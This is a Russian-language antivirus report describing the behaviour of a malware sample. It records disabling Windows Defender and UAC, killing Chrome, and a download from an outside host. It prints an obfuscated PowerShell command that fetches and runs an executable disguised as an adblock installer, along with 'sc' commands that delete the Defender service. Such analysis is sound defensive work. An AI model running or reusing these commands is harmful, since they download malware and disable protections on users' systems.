Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
блокирует:
- Средство контроля пользовательских учетных записей (UAC)
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Import-Module BitsTransfer; S`TA`RT-bi`TST`RaNsF`eR -Source "('ht'+'tp://zippues.xyz/Setup.exe')" -Destination "%TEMP%\Adblock_Setup.exe"; .('cd') ${e`Nv`:TEMP}; ./Adblock_Setup.exe
- '%TEMP%\adblock_setup.exe'
- '<SYSTEM32>\sc.exe' stop windefend
- '<SYSTEM32>\sc.exe' delete windefend
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /im chrome.exe /f
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bit5ef1.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bit5ef1.tmp
Перемещает следующие файлы
- %TEMP%\bit5ef1.tmp в %TEMP%\adblock_setup.exe
Сетевая активность
Подключается к
- 'zi##ues.xyz':80
TCP
Запросы HTTP GET
- http://zi##ues.xyz/Setup.exe
UDP
- DNS ASK zi##ues.xyz
Другое
Ищет следующие окна
- ClassName: 'AutoHotkey' WindowName: '%TEMP%\Adblock_Setup.exe'
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\sc.exe' stop windefend' (со скрытым окном)
- '<SYSTEM32>\sc.exe' delete windefend' (со скрытым окном)
